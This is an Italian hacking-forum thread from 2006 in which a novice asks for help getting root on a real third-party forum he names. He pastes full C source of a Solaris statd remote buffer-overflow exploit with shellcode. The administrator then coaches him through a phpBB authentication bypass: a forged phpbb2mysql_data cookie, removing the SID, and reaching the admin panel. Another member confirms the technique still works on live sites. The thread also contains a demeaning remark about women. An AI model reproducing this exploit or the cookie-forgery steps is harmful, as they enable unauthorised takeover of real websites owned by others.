Il Forum di Orebla.it

Benvenuto nella community di Orebla.it
Oggi è mer 23 ott, 2019 5:18 pm

Tutti gli orari sono UTC + 1 ora




Apri un nuovo argomento Rispondi all’argomento  [ 16 messaggi ]  Vai alla pagina 1, 2  Prossimo
Autore Messaggio
 Oggetto del messaggio: exploit
Messaggio da leggereInviato: dom 06 ago, 2006 1:37 am 
Non connesso
Newbie
Newbie
Avatar utente

Iscritto il: dom 06 ago, 2006 1:27 am
Messaggi: 7
uhm allora, come da copione, eccomi qua, sono abb. inesperto perci? sto postando.

allora sto su un forum, ovviamente voglio i permessi root.
ho gi? trovato le vulnerabilit?, e i relativi exploit ma dio benedetto.

non riesco ad usare gli exploit.

mi spiego meglio, io non conosco C, ho provato a copiare e incollare l'exploit su visual C++ ed eseguirlo.. ma non funza.. e penso che sia una cappellata vero?

Allora vi do il link del forum, vi scrivo la vulnerabilit? e l'exploit relativo. ditemi come mi devo comportare, xk? ci sto perdendo il sonno ;DDD

so benissimo le storie dell'illegalit? e via dicendo don't worry, voglio solo imparare a farlo, non voglio farlo.

nel codice, devo sostituire di sicuro l'host da qualche parte (penso dove ci sia scritto "host", e poi??)
______________________________________________________________

Forum: http://blinkieworld.forumcommunity.net
(non fate caso al forum, mi serve da prova e ho preso il primo forum stupido frequentato da donne che ho trovato.. di solito le donne non capiscono una mazza di pc)


Vulnerabilit?: Multiple Vendor Statd Buffer Overflow Vulnerability

Statd is the RPC NFS status daemon. It is used to communicate status information to other services or host.
The version of statd shipped with many unix implementations contains
a buffer overflow condition. This overflow condition exists in the handling of 'SM_MON' RPC requests.
Any attacker to successfully exploit this vulnerability would gain root privileges on the target host.

Exploit: /*
statd remote overflow, solaris 2.5.1 x86
there is a patch for statd in solaris 2.5, well, it looks like
they check only for '/' characters and they left overflow there ..
nah, it's solaris

usage: ./r host [cmd] # default cmd is "touch /tmp/blahblah"
# remember that statd is standalone daemon

Please do not distribute.
*/

#include <sys/types.h>
#include <sys/time.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpcsvc/sm_inter.h>
#include <sys/socket.h>

#define BUFSIZE 1024
#define ADDRS 2+1+1+4
#define ADDRP 0x8045570;

/* up to ~ 150 characters, there must be three strings */
char *cmd[3]={"/bin/sh", "-c", "touch /tmp/blahblah"};

char asmcode[]="\xeb\x3c\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\xf7
\x83\xc7\x10\x89\x3e\x4f\x47\xfe\x07\x75\xfb\x47\x89\x7e\x04\x4f\
x47\xfe\x07\x75\xfb\x47\x89\x7e\x08\x4f\x47\xfe\x07\x75\xfb\x89\x46\
x0c\x50\x56\xff\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x0


1\x07\x07\xe8\xbf\xff\xff\xff\x02\x02\x02\x02\x02\x02\x02\
x02\x02\x02\x02\x02\x02\x02\x02\x02";
char nop[]="\x90";

char code[4096];

void usage(char *s) {
printf("Usage: %s host [cmd]\n", s);
exit(0);
}

main(int argc, char *argv[]) {
CLIENT *cl;
enum clnt_stat stat;
struct timeval tm;
struct mon monreq;
struct sm_stat_res monres;
struct hostent *hp;
struct sockaddr_in target;
int sd, i, noplen=strlen(nop);
char *ptr=code;

if (argc < 2)
usage(argv[0]);
if (argc == 3)
cmd[2]=argv[2];

for (i=0; i< sizeof(code); i++)
*ptr++=nop[i % noplen];

strcpy(&code[750], asmcode); /* XXX temp. */
ptr=code+strlen(code);
for (i=0; i<=strlen(cmd[0]); i++)
*ptr++=cmd[0][i]-1;
for (i=0; i<=strlen(cmd[1]); i++)
*ptr++=cmd[1][i]-1;
for (i=0; i<=strlen(cmd[2]); i++)
*ptr++=cmd[2][i]-1;
ptr=code+BUFSIZE-(ADDRS<<2);
for (i=0; i<ADDRS; i++, ptr+=4)
*(int *)ptr=ADDRP;
*ptr=0;

printf("strlen = %d\n", strlen(code));

memset(&monreq, 0, sizeof(monreq));
monreq.mon_id.my_id.my_name="localhost";
monreq.mon_id.my_id.my_prog=0;
monreq.mon_id.my_id.my_vers=0;
monreq.mon_id.my_id.my_proc=0;
monreq.mon_id.mon_name=code;

if ((hp=gethostbyname(argv[1])) == NULL) {
printf("Can't resolve %s\n", argv[1]);
exit(0);
}
target.sin_family=AF_INET;
target.sin_addr.s_addr=*(u_long *)hp->h_addr;
target.sin_port=0; /* ask portmap */
sd=RPC_ANYSOCK;

tm.tv_sec=10;
tm.tv_usec=0;
if ((cl=clntudp_create(&target, SM_PROG, SM_VERS, tm, &sd)) == NULL) {
clnt_pcreateerror("clnt_create");
exit(0);
}
stat=clnt_call(cl, SM_MON, xdr_mon, (char *)&monreq, xdr_sm_stat_res,
(char *)&monres, tm);
if (stat != RPC_SUCCESS)
clnt_perror(cl, "clnt_call");
else
printf("stat_res = %d.\n", monres.res_stat);
clnt_destroy(cl);
}



Spero che riusciate ad aiutarmi.. >.<


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: lun 07 ago, 2006 7:34 am 
Non connesso
Amministratore
Amministratore
Avatar utente

Iscritto il: lun 27 dic, 2004 10:32 am
Messaggi: 2614
Località: Ferrara
Prima cosa quello che vuoi fare non ? giusto, anche se loro non capiscono nulla di PC non vedo perc? devi entrare nel loro forum.

Cmq a parte i moralismi, non ri conviene utilizzare i free forum hosting, a parte qualche rara eccezzione tutti gli altri utilizzano versioni personalizzate dei forum anche se portono le diciture di scrip famosi!

Magari cambia obbiettivo e trova un exploit magari in PHP o in PERL che all'inizio sono pi? facili da utilizzare!!

Il C va prima compilato e poi eseguito per farlo funzionare!

_________________
I'm so happy because today
I've found my friends ...
They're in my head

[NIRVANA - LITHIUM]
Il Blog del disperato: http://blog.orebla.it


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: mar 08 ago, 2006 3:11 pm 
Non connesso
Newbie
Newbie
Avatar utente

Iscritto il: dom 06 ago, 2006 1:27 am
Messaggi: 7
Grazie mille per la risposta, per quanto riguarda c che non ho mai studiato.. sono nei guai ^^""

i moralismi don't worry sono abituato, ma se non si prova mai e si studia solo teoricamente non si fanno passi avanti ;D

vedr? di cambiare obbiettivo arigato!

_________________
Il solo computer sicuro è quello staccato dalla rete,
ma ci sarà sempre qualcuno che ti indurrà a collegarlo


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: mar 08 ago, 2006 6:18 pm 
Non connesso
Amministratore
Amministratore
Avatar utente

Iscritto il: lun 27 dic, 2004 10:32 am
Messaggi: 2614
Località: Ferrara
Parti da un obbiettivo pi? semplice!

Ti d? due link e tu devi arrivarci da solo:

http://www.milw0rm.com/exploits/871

http://www.google.it/search?hl=it&q=pow ... ogle&meta=

_________________
I'm so happy because today
I've found my friends ...
They're in my head

[NIRVANA - LITHIUM]
Il Blog del disperato: http://blog.orebla.it


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: mar 08 ago, 2006 7:39 pm 
Non connesso
Newbie
Newbie
Avatar utente

Iscritto il: dom 06 ago, 2006 1:27 am
Messaggi: 7
Molto molto interessante, mi ci metto dietro, ti far? sapere in questo topic come me la sono cavata ;D

_________________
Il solo computer sicuro è quello staccato dalla rete,
ma ci sarà sempre qualcuno che ti indurrà a collegarlo


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: mar 08 ago, 2006 10:27 pm 
Non connesso
Newbie
Newbie
Avatar utente

Iscritto il: dom 06 ago, 2006 1:27 am
Messaggi: 7
cacchionz... non ci sono riuscito.. ? una cacchiata tremenda.. ma o sbaglio qualcosa o non funziona.

allora il sito ?: http://www.xxxxx.it, mi sono registrato, ho cancellato tutti i cookie.

mi sono loggato, in questo modo prendo il cookie del sito.

vado sul cookie.txt di firefox, lo modifico inserendo il doppio: FALSE e

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22
userid%22%3Bs%3A1%3A%222%22%3B%7D

per? non funziona lo stesso, ho provato anche a mettere al posto di userid, il nickname con cui mi sono registrato ma niente da fare.. >.< dici che ho scelto un sito sbagliato?? o sbaglio io qualcosa?

ps: qui nel forum la stringa te l'ho mandata a capo x non deformare la finestra, ma nel cookie.txt la scrivo ovviamente tutta di seguito ;D

___________________________________________________________

eccoti la stringa completa che ho all'interno del file cookie.txt di firefox. dimmi se ? tutto giusto o no.



http://www.xxxxx.it FALSE / FALSE 1186607985 lang italian
http://www.xxxxx.it FALSE / FALSE 1157663995 user MjMwNjpoYXlhdGU5OTpjMTQzYzg1OTNiODM2NGY1MzQ2NmZlNGEzNjgyMDI1OTox
MDo6MDowOjA6MDo6NDA5Ng%3D%3D.www.xxxxx.it FALSE / FALSE 1186608017 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22
userid%22%3Bs%3A4%3A%222306%22%3B%7D

_________________
Il solo computer sicuro è quello staccato dalla rete,
ma ci sarà sempre qualcuno che ti indurrà a collegarlo


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: mer 09 ago, 2006 8:11 am 
Non connesso
Amministratore
Amministratore
Avatar utente

Iscritto il: lun 27 dic, 2004 10:32 am
Messaggi: 2614
Località: Ferrara
Quando scrivi i mess non mettere i link del sito vittima!
Dato che ci? che vuoi fare non ? molto legale non voglio che anche io e il mio sito ci vadano di mezzo, finch? il tutto rimane dimostrativo ? un conto!
Ok??


Cmq ti d? altri due consigli:
1- Con Firefox usa questa estensione che ti semplifica enormente la vita:
http://addneditcookies.mozdev.org/
2- Evita i forum inclusi nei CMS! Perch? a volte sono aggiornati ma rimane la scritta!

_________________
I'm so happy because today
I've found my friends ...
They're in my head

[NIRVANA - LITHIUM]
Il Blog del disperato: http://blog.orebla.it


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: mer 09 ago, 2006 1:12 pm 
Non connesso
Newbie
Newbie
Avatar utente

Iscritto il: dom 06 ago, 2006 1:27 am
Messaggi: 7
orebla ha scritto:
Quando scrivi i mess non mettere i link del sito vittima!
Dato che ci? che vuoi fare non ? molto legale non voglio che anche io e il mio sito ci vadano di mezzo, finch? il tutto rimane dimostrativo ? un conto!
Ok??


evidentemente ho ancora molto da imparare, ti devo le mie scuse. scusa.

per quanto riguarda i consigli, grazie davvero ottimi, ora mi rimetto all'opera e ti faccio sapere sempre qua.

_________________
Il solo computer sicuro è quello staccato dalla rete,
ma ci sarà sempre qualcuno che ti indurrà a collegarlo


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: mer 09 ago, 2006 4:49 pm 
Non connesso
Amministratore
Amministratore
Avatar utente

Iscritto il: lun 27 dic, 2004 10:32 am
Messaggi: 2614
Località: Ferrara
*'][' ]\[ ']['* ha scritto:
evidentemente ho ancora molto da imparare, ti devo le mie scuse. scusa.

per quanto riguarda i consigli, grazie davvero ottimi, ora mi rimetto all'opera e ti faccio sapere sempre qua.


Non ti preoccupare! Poi fammi sapere se hai qualche difficolt?!

Ma miraccomando: NESSUN DANNO! Il piacere ? nell'essere capaci da fare qualcosa! Non nel distruggerla!

_________________
I'm so happy because today
I've found my friends ...
They're in my head

[NIRVANA - LITHIUM]
Il Blog del disperato: http://blog.orebla.it


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: mar 15 ago, 2006 7:03 pm 
Non connesso
Newbie
Newbie
Avatar utente

Iscritto il: dom 06 ago, 2006 1:27 am
Messaggi: 7
allora, c'ho provato + volte, ma niente da fare, il procedimento l'ho capito.. lo so quasi a memoria. ma o tutti i forum si sono installate le patch e non funza + con nessuno oppure sbaglio qualcosa.

senza contare i forum che son gi? stati presi di mira da altri. ^^""

non so, hai qualche altro consiglio?

_________________
Il solo computer sicuro è quello staccato dalla rete,
ma ci sarà sempre qualcuno che ti indurrà a collegarlo


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: mer 16 ago, 2006 6:10 pm 
Non connesso
Amministratore
Amministratore
Avatar utente

Iscritto il: lun 27 dic, 2004 10:32 am
Messaggi: 2614
Località: Ferrara
Dai non puoi dirmi cos?, ? la cosa pi? semplice del mondo!
Allora ti d? un piccolo consiglio. Una volta modificato il cookie "phpbb2mysql_data" cancella l'altro cio? quello relativo al SID e fai in modo che nell'URL della pagina non ci sia il SID!

Poi dovresti vedere in fondo alla pagina il link al pannello di amministrazione!

Cmq non sono stati tutti aggiornati, fidati che ce ne sono ancora tanti!

_________________
I'm so happy because today
I've found my friends ...
They're in my head

[NIRVANA - LITHIUM]
Il Blog del disperato: http://blog.orebla.it


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: mer 16 ago, 2006 9:23 pm 
Non connesso
guru
guru
Avatar utente

Iscritto il: gio 27 ott, 2005 8:24 pm
Messaggi: 180
Località: .:UnKnOw:.
Tranquillo funziona ri-testato stamane :D


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: sab 04 nov, 2006 6:38 pm 
Non connesso
Newbie
Newbie
Avatar utente

Iscritto il: ven 03 nov, 2006 9:55 pm
Messaggi: 26
orebla ha scritto:
Parti da un obbiettivo pi? semplice!

Ti d? due link e tu devi arrivarci da solo:

http://www.milw0rm.com/exploits/871

http://www.google.it/search?hl=it&q=pow ... ogle&meta=


Scusate se mi intrometto.. ho provato 2 diversi forum, e nessuno dei 2 ha dato risultati sperati.

forse l'exploit k ? x le phpbb 2.0.12 nn vale x le versioni precedenti? cm le 2.0.10 cm da te segnato sul link? :roll:


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: sab 04 nov, 2006 6:59 pm 
Non connesso
guru
guru
Avatar utente

Iscritto il: gio 27 ott, 2005 8:24 pm
Messaggi: 180
Località: .:UnKnOw:.
Dipende spesso sono forum "patchati" e quindi non funziona :wink:


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: sab 04 nov, 2006 7:17 pm 
Non connesso
Newbie
Newbie
Avatar utente

Iscritto il: ven 03 nov, 2006 9:55 pm
Messaggi: 26
Capisco.. quindi potrebbero sciverlo quanto nn scriverlo ke il forum sia patchato o no. L'unica ? provare quindi! Tenter? ancora qlk altro forum!

Potreste "indicarmi la retta via" per un altro obbiettivo semplice? :D
Ho tanta voglia d imparare.. :wink:


Top
 Profilo  
 
Visualizza ultimi messaggi:  Ordina per  
Apri un nuovo argomento Rispondi all’argomento  [ 16 messaggi ]  Vai alla pagina 1, 2  Prossimo

Tutti gli orari sono UTC + 1 ora


Chi c’è in linea

Visitano il forum: Nessuno e 1 ospite


Non puoi aprire nuovi argomenti
Non puoi rispondere negli argomenti
Non puoi modificare i tuoi messaggi
Non puoi cancellare i tuoi messaggi
Non puoi inviare allegati

Cerca per:
Vai a:  
Powered by phpBB® Forum Software © phpBB Group
Traduzione Italiana phpBBItalia.net basata su phpBB.it 2010
phpBB SEO